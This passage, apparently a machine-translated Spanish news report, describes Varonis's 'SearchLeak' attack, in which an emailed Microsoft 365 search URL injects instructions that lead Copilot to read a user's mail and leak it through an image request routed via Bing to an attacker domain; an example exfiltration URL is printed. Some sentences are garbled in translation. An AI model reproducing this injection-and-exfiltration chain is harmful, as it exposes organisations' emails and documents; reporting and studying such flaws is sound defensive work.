Para realizar la inyección de parámetro a mensaje, el atacante envía un correo electrónico al objetivo que contiene una URL con la sintaxis https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=. El campo contiene instrucciones. El copiloto obedeció de inmediato.
“La funcionalidad de búsqueda es lo que los atacantes necesitan, porque incluso con capacidades limitadas, basta con que los usuarios tengan acceso a información importante”, afirman los investigadores. escribió el lunes. “Para extraer los datos, el atacante crea una URL que le indica a Copilot que ‘busque el correo electrónico del usuario’, extrae el título y lo incrusta en la URL de la imagen”. La víctima no escribe nada. Hacen clic en un enlace y Copilot hace el resto.
Normalmente, la salida envuelve la barandilla en bloques. funcionará. Pero los investigadores descubrieron que la protección sólo estaba activa después de la fase de "pensamiento". Anteriormente, Copilot generaba sus respuestas utilizando HTML sin formato, representado temporalmente en el DOM del navegador.
Los investigadores escribieron:
Entonces el orden es el siguiente:
- Copilot comienza a transmitir su respuesta, que incluye la etiqueta
- El navegador ve
lo representa y ejecuta una solicitud HTTP a la URL src
- El copiloto terminó de generar. La barandilla envuelve todo
- ¡Tarde! Las solicitudes están fuera.
Los investigadores ahora reciben solicitudes de imágenes del navegador de destino. El problema, como se mencionó anteriormente, es que Copilot no envía solicitudes de imágenes a la mayoría de los sitios web. Para aumentar la escala de esta barrera, la cadena de exploits utiliza el motor de búsqueda Bing de Microsoft como una especie de trampolín. De acuerdo con la política de seguridad de contenidos de Copilot, Bing es uno de los sitios autorizados a enviar dichas solicitudes. Luego, Bing enviará la solicitud al dominio controlado por el atacante incluido en la solicitud. La solicitud se ve así:
https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://actioner.com/STOLEN_DATA/image.png
Varonis llamó al ataque SearchLeak.
"Debido a que SearchLeak apunta al nivel Enterprise de Microsoft, el radio de explosión no se limita solo a los datos personales: puede mostrar cualquier cosa accesible a los usuarios dentro de la organización, incluidos correos electrónicos, invitaciones a reuniones y notas", escribieron los investigadores de la compañía. "Documentos de SharePoint, archivos de OneDrive y otro contenido empresarial indexado. Dependiendo de cómo se conecte M365 con el entorno, el radio de explosión puede ampliarse aún más".
Como se mencionó, Microsoft solucionó la vulnerabilidad que SearchLeak aprovechó el martes. Sin embargo, dado que no se conoce una forma de solucionar la causa raíz del SNAFU, los atacantes inevitablemente encontrarán nuevas formas de eludir la barrera de seguridad recién construida y el proceso se repetirá nuevamente.
